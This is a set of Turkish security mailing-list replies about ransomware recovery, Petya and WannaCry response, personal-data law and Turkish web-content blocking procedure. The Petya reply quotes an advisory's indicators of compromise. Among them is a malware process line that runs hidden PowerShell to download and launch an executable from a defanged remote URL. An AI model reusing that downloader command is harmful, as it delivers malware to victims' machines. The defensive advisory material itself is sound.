Re: [NetsecTR] Şifrelenmiş veri kurtarma

[Mustafa TURAN]

Merhaba,

Öncelikle geçmiş olsun umarım dosyalar kurtulur.

Aşağıdaki siteye bir örnek yükleyerek zararlı yazılımın tipini tespit
edebilirsiniz.

https://www.nomoreransom.org/

Sonrasında eğer varsa çözümünü de veriyor.

Faydalı olması dileğiyle.

İyi günler.



On 30 Apr 2020 Thu at 09:52 MURAT YILMAZ  wrote:

> Merhabalar,
>
> Bir arkadaşın bilgisayarı hacklenip verileri şifrelenmiş ve ekteki gibi
> bir mesaj bırakılmış.
>
> Bu tip ransomeware islemleri için Tübitak bünyesinde bir birim kurulmuştu,
> bazı sifreleri kırıp verileri geri alabildiklerini duymuştum. Bu birim
> aktif midir ya da başka çözüm önerisi olan arkadaş var mıdır?
>
> Muhasebeci bir arkadaş, bu işten 3 kişi ekmek yiyor, malesef tüm verileri
> gitmiş durumda.
> Yardımlarınızı rica ederim.
>
> Teşekkürler.
>
> Murat YILMAZ
>
>
> [image: Image]
>
> -
> Üyelikten ayrılmak için
> netsec-le...@netsectr.org adresine mail atabilirsiniz.
>
> -

-- 

+ +++[- > < ]>+++ + + .<+++ +++[- > ++<]> .
--.+. < [->-- --<]> ---.+ . - .<+++ + [->-- - -<]>-
.<+++ [ ->+++ < ]>+++ .+.-- -.<++ ++[-> < ]>-.< +++[- >+++<
]>+++ +.<
-
Üyelikten ayrılmak için
netsec-le...@netsectr.org adresine mail atabilirsiniz.

-

Re: [NetsecTR] Active Directory klasörlerimiz rarlanmış ve şifrelenmiş

[Mustafa TURAN]

https://www.nomoreransom.org/

sitesini deneyebilirsin, buradaki araçlar ücretsiz...

Geçmiş olsun

On Wed, Feb 13, 2019 at 2:38 PM Halil Arıcı  wrote:

> Merhabalar ,
> Bugün bir mail aldık. İki firmamızın active directoryleri rarlanıp
> şifrelenmiş. Acaba bir çözümü var mıdır ?  veri.dep...@mail.ru üzerinden
> gelmiş.
> Bir çözümü varsa lütfen söyler misiniz ?
>
>
>
> --
> --
> *İyi çalışmalar dilerim...*
>
> -
> Ücretsiz Phishing Domain Tespiti ve Alarm Servisi  -
> https://services.normshield.com/phishing-domain-search
>
> -



-- 


+ +++[- > < ]>+++ + + .<+++ +++[- > ++<]> .
--.+. < [->-- --<]> ---.+ . - .<+++ + [->-- - -<]>-
.<+++ [ ->+++ < ]>+++ .+.-- -.<++ ++[-> < ]>-.< +++[- >+++<
]>+++ +.<
-
Ücretsiz Phishing Domain Tespiti ve Alarm Servisi  - 
https://services.normshield.com/phishing-domain-search

-

Re: [NetsecTR] Petya ransomware hakkinda

[Mustafa TURAN]

Merhaba

Yapilacaklar icin asagidakilere bakabirsiniz.

Kaynak: https://www.cyberbit.com/endpoint-security/petya-ransomware/


What you should do

   1. Patch Microsoft Office to prevent infection via Microsoft Word
   attachments – install the CVE-2017-0199 update
   

to
   patch Microsoft Office/WordPad Remote Code Execution Vulnerability.
   2. Patch Windows Workstations: if you have not done that after the
   WannaCry attack install the SMBv1 patch
    now
   in order to prevent the attack from spreading.
   3. Use gPO to block SMB & WMI protocols E- 135,445,1024-1035 TCP as an
   additional safety measure preventing the EternalBlue exploit.
   4. Disable shutdown via command line: disables the option to use cmd /k
   shutdown -a. This command is used by the malware to initially shut down
   the computer, after which the computer will boot from the new malware boot
   loader.
   5. Disable file execution in appdata and temp paths: disable the option
   to run .exe files in paths %AppData% and %Temp%.
   6. IOCs:

Files:

File NameOrder-20062017.doc

MD5 Hash Identifier   415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84

SHA-256 Hash Identifier
 FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Size6215 bytes

File Type  Rich Text Format data



File Namemyguy.xls

MD5 Hash Identifier   0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73

SHA-256 Hash Identifier
 EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

File Size13893 bytes

File Type  Zip archive data



File NameBCA9D6.exe

MD5 Hash Identifier   A1D5895F85751DFE67D19CCCB51B051A

SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060

SHA-256 Hash Identifier
 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD

File Size275968 bytes



IPs:

141.115.108

165.29.78

200.16.242

90.139.247

Processes:

mtshta.exe %WINDIR%\System32\mshta.exe” “C:\myguy.xls.hta” ” (PID: 2324)

powershell.exe -WindowStyle Hidden (New-Object
System.Net.WebClient).DownloadFile(‘h11p://french-cooking.com/myguy.exe’,
‘%APPDATA%\10807.exe’);” (PID: 2588, Additional Context: (
System.Net.WebClient).DownloadFile(‘h11p://french-cooking.com/myguy.exe’,
‘%APPDATA%\10807.exe’) [image: ]

.10807 exe %APPDATA%\10807.exe” ” (PID: 3096)





On Jun 28, 2017 9:24 AM, "Kayhan Yüksel"  wrote:

> Merhaba
>
> Petya ransomware inin etkilediği sistemlerin  sürümleri ile listesi, hangi
> zaafiyetleri kullanarak yayıldığı ve engellenmesi için gerekli tedbirleri
> içeren kaynak önerebilir misiniz?
> Teşekkürler, iyi çalışmalar
>
> Kayhan Yüksel
>
>
> -
> Sinara Labs. E-Posta Tehdit Simülasyonu
>
> ets.sinaralabs.com
>
> -
>
-
Sinara Labs. E-Posta Tehdit Simülasyonu

ets.sinaralabs.com

-

Re: [NetsecTR] şifrelenmiş dosyalar

[Mustafa TURAN]

Merhaba,

bnu siteyi incelemenizi tavsiye ederim.

https://www.nomoreransom.org/

Syg.

MT

2017-06-21 17:59 GMT+03:00 HASAN TURMA :

>
> merhabalar ,üniversitemizde bir personelimizin kullandığı bilgisayarda tüm
> dosyalar .248817 uzantı şeklinde şifrelenmiş
>
> bilgisi yada öneri olan varmıdır bu konuda
> *Saygılarımla...*
>
> * Hasan TURMA *| Şube Müdürü | Karabük Üniversitesi
> Bilgi İşlem Daire Başkanlığı | Tel: +90 (370) 433 4018
> <+90%20370%20433%2040%2018> | Dahili: 2173 |
> 
> 
> P Lütfen bu e-postayı yazdırmadan önce çevrenizi düşünün. | Please
> consider the environment before printing this email
>
> -
> BGA Wiki - Penetration Test Wiki
>
> http://wiki.bgasecurity.com/Kategori:Pentest
>
> -
>
-
Sinara Labs. E-Posta Tehdit Simülasyonu

ets.sinaralabs.com

-

Re: [NetsecTR] Telefon numarası ve Kişisel Verilerin Korunması

[Mustafa TURAN]

Merhaba,

Kişisel Veri;
“Kimliği belirli veya belirlenebilir gerçek kişiye ilişkin her türlü
bilgidir.”

sorunuza kısaca evet diyebiliriz, detaylar için bu yazıya göz atabilirsiniz.


http://hassasveri.com/kisisel-veri-ornekleri/


Saygılarımla,

MT

2017-06-23 9:01 GMT+03:00 Tevfik Ceydeliler <
tevfik.ceydeli...@astron.yasar.com.tr>:

> Merhaba
>
> Yeni kanuna göre sadece telefon numarası Kişisel veri kapsamına giriyor mu
> ?
>
>
>
> On 06/21/2017 05:41 PM, Serdar hızal wrote:
>
> merhaba,
>
> hocam ben bu hatayı alıyorum. (karşı tarafın güvenlik duvarı kapalı ve
> zafiyet açık)
>
> saygılarımla
>
> 20 Haziran 2017 22:17 tarihinde Alpcan Onaran 
> yazdı:
>
>> Merhaba herkese,
>>
>> Youtubeda siber güvenlik ile ilgili zafiyetleri kullanmayı, ağ taraması
>> yapmayı hangi toolun nasıl kullanıldığını anlatan bir kanal olmadığını
>> farkettim ve dün bununla ilgili bir kanal başlattım.
>> İlk olarak çok basit zafiyetleri işlesemde ilerde sosyal mühendislik,
>> antivirus-endpoint security atlatma, yazılım ve fiziksel saldırılarıda
>> işleyeceğim.
>>
>> ms17_010 ile ilgili videoma bu linkten erişebilirsiniz.
>>
>> https://www.youtube.com/watch?v=e__ZQc6vJ28
>>
>> Haftada 2-3 video yüklemeye çalışacağım.
>>
>> Lütfen desteklerinizi, beğenilerinizi ve eleştirilerinizi esirgemeyin.
>> Bazı yerlerde bazı hatalı bilgiler var ama ilerde en aza indireceğim.
>>
>>
>>
>> -
>> BGA Wiki - Penetration Test Wiki
>>
>> http://wiki.bgasecurity.com/Kategori:Pentest
>>
>> -
>>
>
>
>
> -
> BGA Wiki - Penetration Test Wiki
> http://wiki.bgasecurity.com/Kategori:Pentest
>
> -
>
>
> --
>
>
>
> Bu elektronik postada bulunan tum fikir ve gorusler ve ekindeki dosyalar
> sadece adres sahip/sahiplerine ait olup, Yasar Toplulugu Sirketleri bu
> mesajin icerigi ile ilgili olarak hic bir hukuksal sorumlulugu kabul etmez.
> Eger gonderilmesi dusunulen kisi veya kurulus degilseniz, lutfen gonderen
> kisiyi derhal haberdar ediniz ve mesaji sisteminizden siliniz. The
> information contained in this e-mail and any files transmitted with it are
> intended solely for the use of the individual or entity to whom they are
> addressed and Yasar Group Companies do not accept legal responsibility for
> the contents. If you are not the intended recipient, please immediately
> notify the sender and delete it from your system.
> -
> Sinara Labs. E-Posta Tehdit Simülasyonu
>
> ets.sinaralabs.com
>
> -
>
-
Sinara Labs. E-Posta Tehdit Simülasyonu

ets.sinaralabs.com

-

[NetsecTR] WannaCry - Lessons Learned / Öğrenilen Dersler

[Mustafa TURAN]

> Herkese merhabalar,
>
> bilindiği gibi yaşanan olumsuz bir olay sonrası hasar tespit ve öğrenilmiş
> derslerin gözden geçirilmesi, sonraki olaylarda bizler için fayda
> sağlamaktadır.
>
> 12 Mayıs Cuma günü başlayan WannaCry Ransomeware'i olayı öncesinde,
> sırasında veya sonrasında gördüğünüz olumsuz giden şeyleri ve önerisini
> gruptakiler ile paylaşabilir misiniz.
>
> Eminim ki tüm sektör çalışanlarının işine yarayacak ve toplamda da *Ülkemizin
> Siber Dayanıklılığını arttırıcı* bir fayda sağlayacaktır.
>
> Yardımcı olması açısından, Örnek olarak aşağıdaki şablonda bir satır
> doldurulmuştur.
>
>
> No Kategori Öneri Sahibi Problem veya Olay Etkisi Sizin Öneriniz
> 1 Yama Yönetimi Mustafa TURAN Yamalar düzenli olarak takip edilmiyor.
> Eski işlerim sistemleri kullanılıyor. Windows ve diğer sitemlerin
> güvenlik açıkları nedeniyle Gizlilik, Bütünlük ve Erişilebilirlik
> açıklarıyla istismar edilebilmesi. İş kesintileri, mali kayıplar, itibar
> kaybı vs. WSUS aktive edilmeli,
> Windows güncellemeleri takip edilmeli,
> Raporlar alınmalı ve gerekirse manuel güncellemeler yapılmalı, vb.
> 2
> 3
> 4
> 5
> 6
> 7
> 8
> 9
> 10
>
> [image: Inline image 1]
>
>
> Şimdiden katılan herkese teşekkür ederim.
>
> *Not: Çalışmanın tamamı konsolide edilerek tekrar grupta paylaşılacaktır.*
>
>
>
> Saygilarimla,
>
> Mustafa TURAN
>
-
BGA Wiki - Penetration Test Wiki

http://wiki.bgasecurity.com/Kategori:Pentest

-

Re: [NetsecTR] Black List Uygulaması

[Mustafa TURAN]

Merhaba,

Internet cikisiniz yurtdisindan mi? IP adresinizi ISP den kontrol
edebilirsiniz, bir bulut hizmeti uzerinden kullaniyorsaniz IP adresiniz
yurtdisi olarak da gorunuyor olabilir

Ayrica bir otomasyon ile toplu islem yapiyosaniz anlik islem adedi cok
fazla gelmis olabilir.

Bilginize

On Apr 25, 2017 11:47 AM, "Yavuz Selim EROL" 
wrote:

> Merhabalar,
>
>
>
> Gelir İdaresi Başkanlığı tarafından çalıştığım kuruma ait ip adresi black
> list'e alındığını öğrendik. Gelir idaresi başkanlığının web sitesine
> giremiyoruz ve beyanname veremiyoruz. Bu konuda bir tecrübesi olan var
> mıdır? Kurumlar bu blacklist uygulamasını neye göre yapıyorlar. Gelir
> İdaresi Başkanlığından muhatap bulamadığımdan net bir bilgi alamıyorum.
> Tecrübesi olanlar bilgi verirse sevinirim.
>
>
>
> Kolay gelsin.
>
> "Bu e-posta mesajı ve onunla iletilen tüm ekler sadece yukarıda isimleri
> belirtilen kişiler ya da kuruma özel olup, özel bilgiler içerebileceği gibi
> gizlilik yükümlülüğü de taşıyor olabilir. Mesajın yetkili alıcısı veya
> alıcısına iletmekten sorumlu kişi değilseniz, mesaj içeriğini ya da
> eklerini kullanmayınız, kopyalamayınız, yaymayınız, başka kişilere
> yönlendirmeyiniz ve mesajı gönderen kişiyi derhal e-posta yoluyla haberdar
> ederek bu mesajı ve eklerini herhangi bir kopyasını muhafaza etmeksizin
> siliniz. Türkiye Cumhuriyeti İçişleri Bakanlığı bu mesajın içeriği ile
> ilgili olarak hiçbir hukuksal sorumluluğu kabul etmemektedir. Bu mesajda ve
> ekindeki dosyalarda bulunan tüm fikir ve görüşler sadece adres yazarına ait
> olup, Türkiye Cumhuriyeti İçişleri Bakanlığının resmi görüşünü
> yansıtmamaktadır. Türkiye Cumhuriyeti İçişleri Bakanlığı e-posta içeriğine
> yetkisiz olarak yapılan müdahaleden, e-postanın zararlı yazılım içermesi
> ve/veya bilgisayar sisteminize verebileceği herhangi bir zarardan sorumlu
> değildir."
>
> "This e-mail message itself and related attachments are private to
> abovementioned individuals and/or entity and may contain private
> information as well as confidentiality obligations. If you are not the
> intended recipient of this message or the person who is responsible for the
> transmission of it to the intended recipient; do not use, copy, distribute
> or forward the content of message and attachments. Notifying the sender
> immediately through an e-mail, please delete the message and attachments
> without keeping any copies. Republic of Turkey Ministry of Interior shall
> have no legal liability regarding the content of this message and its
> attachments. The opinions and views expressed in this message and
> attachments are solely those of the author/sender and do not necessarily
> reflect the official opinion of Republic of Turkey Ministry of Interior.
> Republic of Turkey Ministry of Interior accepts no responsibility for any
> damage to your system caused by unauthorized interference to e-mail content
> and/or harmful software transmitted by this e-mail."
> -
> BGA Wiki - Penetration Test Wiki
>
> http://wiki.bgasecurity.com/Kategori:Pentest
>
> -
-
BGA Wiki - Penetration Test Wiki

http://wiki.bgasecurity.com/Kategori:Pentest

-

Re: [NetsecTR] Bilgi Güvenliği Alanında Kariyer

[Mustafa TURAN]

Merhaba Cenk,

aşağıdaki video'ların yardımı olması dileğiyle...


https://www.youtube.com/playlist?list=PLKrkeCUPIKhuJxqo-CCSdKT35Qa568Vil


Başarılar dilerim...

Saygılarımla,





Saygilarimla,

Mustafa TURAN

2017-04-04 15:42 GMT+03:00 cenk akyel <cenk.ak...@yandex.com>:

> Merhabalar,
>
> 33 yaşındayım, yaklaşık 10 yıldır bilişim sektöründe yazılım
> geliştirme, veritabanı yönetimi, proje yönetimi dahil farklı alanlarda
> tecrübe edindim. Ancak artık bilgi güvenliği alanında çalışmak istiyorum.
> Bu konuda bazı hususlarda sizlere danışmak istiyorum;
>
> 1. Bu yaştan sonra yeni bir alana geçmek (tabiri caizse sıfırdan başlamak)
> sizce mantıklı mı?
>
> 2. Bilgi güvenliği alanında gördüğüm kadarıyla sertifikalara büyük önem
> veriliyor, ben de CEH sertifikası almak için çalışmayı düşünüyorum. Udemy
> benzeri çevrimiçi eğitim ortamları hem gerçekten öğrenmek hem de sertifika
> almak için yeterli olur mu, yoksa klasik eğitim mi almalıyım?
>
> 3. Klasik eğitim almam gerekiyorsa TSE mi, özel şirketleri mi tercih
> etmeliyim?
>
> Bu hususların dışında başka tavsiyeleriniz/yönlendirmeleriniz olursa
> memnun olurum.
>
> Teşekkürler, iyi çalışmalar...
>
>
>
> -
> Günlük pentest(sızma testi) teknik ipuçları - https://twitter.com/
> dailypentest
>
> -
>
-
BGA Wiki - Penetration Test Wiki

http://wiki.bgasecurity.com/Kategori:Pentest

-

Re: [NetsecTR] Web Site İçeriği Engellemek

[Mustafa TURAN]

Merhaba,

Mahkeme karariniz varsa asagidaki maddeye istinaden diger linker icin de
ayni islemleri yaptirtabilirsiniz.

- Kişiye ilişkin aynı mahiyette içerikler başka İnternet adreslerinde de
yayınlanabilir. Bu durumda ilgili kişinin müracaatı halinde; hakimin
verdiği “Erişimin Engellenmesi” kararı, Erişim Sağlayıcıları Birliği
tarafından tüm adresler için de uygulanacaktır.


On Feb 3, 2017 5:55 PM, "Ersin ÖZTÜRK" <e.belgar...@gmail.com> wrote:

>
> Merhabalar,
>
> Aslında Durum Şu : Açılmış Olan ve yasaklama kararı verilen Bir mahkeme
> kararı var.
> Ama Web Sitesi Linkini değiştirip tekrar yayınlamaya başladılar.
> Karar, Delil Gösterilen link için yayın yasaklama olarak verildiğinden
> linki değiştirince yayına devam edebiliyor,
>
> Örnek bir dava metni olsa belki çözülebilir,
> belki Kararın Direkt Delil Olarak Gösterilen Link Üzerinden Değil de,
> İçerikle İlgili verilmesi daha doğru olacak gibi.
>
> Normalde Süreç Nasıl İşliyor Nerede Hata Yapıyoruz
>
> Şimdiden teşekkürler
>
>
>
> İyi Çalışmalar
>
> *Ersin ÖZTÜRK*
>
> *ER|O Bilişim ve Danışmanlık*
>
>
> *ISO:27001 Bilgi Güvenliği Yönetim Sistemi Baş Denetçi*
>
> ☎ 0 212 278 19 68 <(0212)%20278%2019%2068>
>
> ☎ 0 532 321 69 52 <0532%20321%2069%2052>
>
> 3 Şubat 2017 14:14 tarihinde Mustafa TURAN <mustafa2...@gmail.com> yazdı:
>
>> Merhaba Ersin Bey,
>>
>> öncelikle geçmiş olsun, 5651 sayılı yasaya dayanarak aşağıda anlatacağım
>> iki yoldan uygun olanını seçerek ilerleyebilirsiniz.
>>
>> BTK'nın sitesinde, en altta "Özel Hayatın Gizliliğinin İhlali" link'i
>> vardır, oradan başvurunuzu online yapabilirsiniz. (Direkt link aşağıda)
>>
>>
>> https://www.ihbarweb.org.tr/ohg/
>>
>>
>>
>> İnternetteki mağduriyetleriniz;
>> “Kişilik Haklarının İhlali” ve
>> “Özel Hayatın Gizliliğinin İhlali” olarak 2 temel grupta toplanmaktadır.
>> Bu 2 ihlalin engellenmesinde “Mahkeme Kararı”nın alınması esastır.
>>
>> 1-) "İnternet ortamında “Kişilik Haklarının İhlal” edildiğini iddia eden
>> ve bu içeriğin çıkarılmasını isteyen kişilerin hareket şekli, aşağıdaki
>> belirtilen şekilde olacaktır:
>>
>> - Kişi; bu içeriğin çıkarılması için “İçerik veya Yer Sağlayıcısına”
>> müracaat edebileceği gibi, doğrudan Sulh Ceza Mahkemesine de
>> başvurabilecektir.
>> - Kişi eğer “Sulh Ceza Mahkemesine” müracaat etmişse, Hakim bu başvuruya
>> 24 saat içinde karar verecektir.
>> - Hakim; kişinin müracaatını haklı bulursa, “Kişilik İhlalinin”
>> gerçekleştiği yayının “URL Adresine Erişiminin Engellenmesine” ilişkin
>> karar verecektir.
>> - Bu karar hakim tarafından doğrudan “Erişim Sağlayıcılar Birliğine”
>> gönderilecektir.
>> - “Erişim Sağlayıcılar Birliği” bu kararı 4 saat içinde tüm “Erişim
>> Sağlayıcılarına” ileterek, bu URL’ye erişimi engelleyecektir.
>> - Bu kararda; söz konusu içeriğin öncelikle “engellenmesi” istenmekte,
>> içeriğin çıkarılmasının daha sonra yapılması hedeflenmektedir.
>> - Hakimin vereceği karar; yalnızca “Kişilik Hakkının İhlal” edildiği
>> kısım veya sayfaya ilişkin “URL Adresi” olacağı için, bütün bir sitenin
>> kapanması önlenecektir.
>> - Kişiye ilişkin aynı mahiyette içerikler başka İnternet adreslerinde de
>> yayınlanabilir. Bu durumda ilgili kişinin müracaatı halinde; hakimin
>> verdiği “Erişimin Engellenmesi” kararı, Erişim Sağlayıcıları Birliği
>> tarafından tüm adresler için de uygulanacaktır.
>>
>> 2-) İnternet ortamında “Özel Hayatının Gizliliğinin ihlal edildiğini”
>> iddia eden ve bu içeriğin çıkarılmasını isteyen kişilerin hareket şekli ise
>> aşağıda belirtildiği gibi olacaktır:
>>
>> - Kişi; bu içeriğin çıkarılması için bu içeriğe ilişkin “URL Adresi” ve
>> “Kimliğini ispatlayıcı bilgiler” ile Telekomünikasyon İletişim Başkanlığına
>> başvuracaktır.
>> - Telekomünikasyon İletişim Başkanlığı, müracaat eden kişinin Kimlik
>> bilgilerini doğruladıktan sonra, bu talebi hemen “Erişim Sağlayıcılar
>> Birliğine” iletecek, Birlik 4 saat içinde bu URL adresine erişimi
>> engelleyecektir.
>> - Başvuru sahibi; Erişimin engellenmesinden sonra en geç 24 saat içinde
>>  “Sulh Ceza Mahkemesine” başvurmak zorundadır.
>> - Hakim; kişinin müracaatını haklı görürse, “Özel Hayatın Gizliliğine”
>> ilişkin yayının “URL Adresine Erişiminin” engellenmesine ilişkin karar
>> verecektir.
>> - Bu karar hakim tarafından ”Erişim Sağlayıcılar Birliğine” gönderilecek
>> ve belirtilen URL adresine erişimin engellenmesine devam edilecektir.
>> - Hakimin kararı olumsuz olursa, yine bu karar “Erişim Sağlayıcılar
>> Birliğine” gönderilecek ve enge

Re: [NetsecTR] Web Site İçeriği Engellemek

[Mustafa TURAN]

Merhaba Ersin Bey,

öncelikle geçmiş olsun, 5651 sayılı yasaya dayanarak aşağıda anlatacağım
iki yoldan uygun olanını seçerek ilerleyebilirsiniz.

BTK'nın sitesinde, en altta "Özel Hayatın Gizliliğinin İhlali" link'i
vardır, oradan başvurunuzu online yapabilirsiniz. (Direkt link aşağıda)


https://www.ihbarweb.org.tr/ohg/



İnternetteki mağduriyetleriniz;
“Kişilik Haklarının İhlali” ve
“Özel Hayatın Gizliliğinin İhlali” olarak 2 temel grupta toplanmaktadır.
Bu 2 ihlalin engellenmesinde “Mahkeme Kararı”nın alınması esastır.

1-) "İnternet ortamında “Kişilik Haklarının İhlal” edildiğini iddia eden ve
bu içeriğin çıkarılmasını isteyen kişilerin hareket şekli, aşağıdaki
belirtilen şekilde olacaktır:

- Kişi; bu içeriğin çıkarılması için “İçerik veya Yer Sağlayıcısına”
müracaat edebileceği gibi, doğrudan Sulh Ceza Mahkemesine de
başvurabilecektir.
- Kişi eğer “Sulh Ceza Mahkemesine” müracaat etmişse, Hakim bu başvuruya 24
saat içinde karar verecektir.
- Hakim; kişinin müracaatını haklı bulursa, “Kişilik İhlalinin”
gerçekleştiği yayının “URL Adresine Erişiminin Engellenmesine” ilişkin
karar verecektir.
- Bu karar hakim tarafından doğrudan “Erişim Sağlayıcılar Birliğine”
gönderilecektir.
- “Erişim Sağlayıcılar Birliği” bu kararı 4 saat içinde tüm “Erişim
Sağlayıcılarına” ileterek, bu URL’ye erişimi engelleyecektir.
- Bu kararda; söz konusu içeriğin öncelikle “engellenmesi” istenmekte,
içeriğin çıkarılmasının daha sonra yapılması hedeflenmektedir.
- Hakimin vereceği karar; yalnızca “Kişilik Hakkının İhlal” edildiği kısım
veya sayfaya ilişkin “URL Adresi” olacağı için, bütün bir sitenin kapanması
önlenecektir.
- Kişiye ilişkin aynı mahiyette içerikler başka İnternet adreslerinde de
yayınlanabilir. Bu durumda ilgili kişinin müracaatı halinde; hakimin
verdiği “Erişimin Engellenmesi” kararı, Erişim Sağlayıcıları Birliği
tarafından tüm adresler için de uygulanacaktır.

2-) İnternet ortamında “Özel Hayatının Gizliliğinin ihlal edildiğini” iddia
eden ve bu içeriğin çıkarılmasını isteyen kişilerin hareket şekli ise
aşağıda belirtildiği gibi olacaktır:

- Kişi; bu içeriğin çıkarılması için bu içeriğe ilişkin “URL Adresi” ve
“Kimliğini ispatlayıcı bilgiler” ile Telekomünikasyon İletişim Başkanlığına
başvuracaktır.
- Telekomünikasyon İletişim Başkanlığı, müracaat eden kişinin Kimlik
bilgilerini doğruladıktan sonra, bu talebi hemen “Erişim Sağlayıcılar
Birliğine” iletecek, Birlik 4 saat içinde bu URL adresine erişimi
engelleyecektir.
- Başvuru sahibi; Erişimin engellenmesinden sonra en geç 24 saat içinde
 “Sulh Ceza Mahkemesine” başvurmak zorundadır.
- Hakim; kişinin müracaatını haklı görürse, “Özel Hayatın Gizliliğine”
ilişkin yayının “URL Adresine Erişiminin” engellenmesine ilişkin karar
verecektir.
- Bu karar hakim tarafından ”Erişim Sağlayıcılar Birliğine” gönderilecek ve
belirtilen URL adresine erişimin engellenmesine devam edilecektir.
- Hakimin kararı olumsuz olursa, yine bu karar “Erişim Sağlayıcılar
Birliğine” gönderilecek ve engelleme kaldırılacaktır.
- Sulh Ceza Mahkemesinin bu konudaki olumlu/olumsuz kararının 48 saat
içinde verilmesi gerekmektedir.
-“Özel Hayatın Gizliliği” ile ilgili konularda istisnai olarak
Telekomünikasyon İletişim Başkanı tarafından da erişimin engellenmesi
yapılabilecektir.
- Telekomünikasyon İletişim Başkanı’nın müdahalesi ancak;
• “Özel Hayatın Gizliliği” ile ilgili bir durumda,
• Gecikmesinde sakınca bulunan hallerde ve
• Sadece söz konusu içeriğe ilişkin URL bazında olacaktır.
- Telekomünikasyon İletişim Başkanı’nın bu kararı Başkanlık tarafından 24
saat içinde  Sulh Ceza Mahkemesine götürülecek, Mahkeme bu konudaki
kararını 48 saat içinde verecektir.
Mahkemenin kararına göre erişimin engellenmesine devam edilecek veya bu
erişim engellemesi kaldırılacaktır.

Saygılarımla,

Mustafa TURAN



Saygilarimla,

Mustafa TURAN

2017-02-02 10:25 GMT+03:00 Ersin ÖZTÜRK <e.belgar...@gmail.com>:

> Merhabalar,
>
> Bir web sitesi içeriğinde Çıkarmak istediğimiz bazı bilgiler var ve birkaç
> defa hukuki yoldan başvurmamıza rağmen sadece link değiştirilip içeriğin
> yayınlanmasına devam edildiği görüldü.
>
> Nasıl Bir Yöntem izlenmeli,
>
> İkinci Yol Site Sahiplerine Direkt Ulaşmak Olabilir
>
> Bir web sitesinin gerçek sahibini İletişim Bilgilerini Nasıl Bulabiliriz
> Whois Bilgileri Gizlenmiş durumda
>
>
> İyi Çalışmalar
>
> *Ersin ÖZTÜRK*
>
> *ER|O Bilişim ve Danışmanlık*
>
>
>
>
> -
>
>
>
> -
>
-



-

Re: [NetSec] T.C. Kimlik Numarası veya Kimlik Fotokopisi

[Mustafa TURAN]

Merhaba Abdullah Bey,

sorularınızın tümünü *6698 *sayılı "*Kişisel Verilerin Korunması Kanunu*'nda"
bulabilirsiniz.

www.resmigazete.gov.tr/eskiler/2016/04/20160407-8.pdf

Bilginize.

Saygılarımla,

Mustafa TURAN



Saygilarimla,

Mustafa TURAN

2016-08-24 13:55 GMT+03:00 Abdullah Çetinkaya <m...@abdullahcetinkaya.com.tr
>:

> Merhaba,
>
> Bir Local Bilgisayarda sadece bir kaç kişinin erişim izni olan bir
> uygulama ile kullanıcıların kimlik bilgileri ve kimlik fotokopisi alınıp
> depolanacak.
>
> Aşağıdaki sorularım ile alakalı bir rapor hazırlayıp ona göre bu
> bilgilerin alınması veya saklanmasında değişikliğe gidicem uygulamamda.
>
> Şimdiden Teşekkürler.
>
> Sorularım Şu;
> 1 - Kimlik bilgilerini saklamamda hukuki acıdan bir sorun teşkil eder mi?
> (Kullanıcı Bilgisi ve Onayı Dahilinde )
> 2 - Bu saklama işlemi için onay veya bir bildirim yapmalımıyım BTK veya
> başka bir kurum ?
> 3 - Sakladığım bilgileri hangi metod veya şifreleme ile yapmalıyım (Öneri?)
> 4 - Sakladığım bilgileri system yöneticileri tarafından alınması,
> kopyalaması, taşıması sistemi yazan olarak benide şuça ortak eder mi?
> 5 - Saklanan bilgilerin kurum dışına çıkması sonuçu ne tür bir cezai
> uygulama veya ne tür bir dava acılması mümkün olur.
>
> ---
> Kredi Kartı Kullanımı ve Farkındalık Anketi
>
> https://www.bgasecurity.com/anket/
>
> ---
---
Kredi Kartı Kullanımı ve Farkındalık Anketi

https://www.bgasecurity.com/anket/

---

Re: [NetSec] Kredi Kartı Kullanımı Farkındalık Anketi

[Mustafa TURAN]

Merhaba,

anketi doldurdum fakat şüpheli alışveriş sorusuna bir şık daha
eklemelisiniz, bende hiç şüpheli işlem olmadığı için 1 günü seçmek zorunda
kaldım.

Bilginize.



Saygilarimla,

Mustafa TURAN

2016-08-11 12:14 GMT+03:00 Omer ALBAYRAK <omeralbay...@gmail.com>:

> Merhabalar
>
> Kredi kartlarımız POS cihazlarından veya İnternet üzerinden yapılan
> alışverişlerle büyük riskleri beraberinde getirebiliyor. Ülkemizde bilinçli
> kredi kartı kullanım durumunu ortaya çıkartmak ve bilgi güvenliği
> farkındalığını artırmak için oluşturduğumuz Kredi Kartı Kullanımı
> Farkındalık Anketimize sizleri davet ediyoruz.
>
> Altı sorudan oluşan kısa anketimizin anonim olarak yapılmasını tercih
> ettiğimiz için herhangi bir kişisel bilgi alınmamakta ve sorularda
> zorunluluk bulunmamaktadır.
>
> Anketimize katılmak için;  http://bgasecurity.com/anket/
>
> Destekleriniz için teşekkürlerimizi sunar, iyi çalışmalar dileriz.
>
>
>
> ---
> Kredi Kartı Kullanımı ve Farkındalık Anketi
>
> https://www.bgasecurity.com/anket/
>
> ---
>
---
Kredi Kartı Kullanımı ve Farkındalık Anketi

https://www.bgasecurity.com/anket/

---

[NetSec] NSA'in Hacker'lar ile Mücadelesi

[Mustafa TURAN]

Merhaba,

Amerikan gizli servisi ​NSA'in ​ataklara karşı verdikleri mücadeleyi
anlattıkları video...


​ Extraordinary NSA briefing on how to stop nation-state attacks

https://youtu.be/bDJb8WOJYdA



Saygilarimla,

Mustafa TURAN
---
Bilgi Güvenliği AKADEMİSİ Eğitim Takvimi Güncellendi.

https://www.bgasecurity.com/egitim-takvimi/
---

[NetSec] Phishing - WhatsApp Gold

[Mustafa TURAN]

Merhaba arkadaşlar,

aşağıdaki link aracılığı ile görebileceğiniz WhatsApp oltalaması için
Türkiye'den herhangi bir vaka duyan veya gören var mı?

WhatsApp Gold: DON'T be fooled by this secret premium version being offered
to 'elite' users

http://www.ibtimes.co.uk/whatsapp-gold-dont-be-fooled-by-this-secret-premium-version-being-offered-elite-users-1561770




Saygilarimla,

Mustafa TURAN
---
NetSec Topluluğu Siber Güvenlik Etkinliği - İstanbul- 28 Mayıs 2016

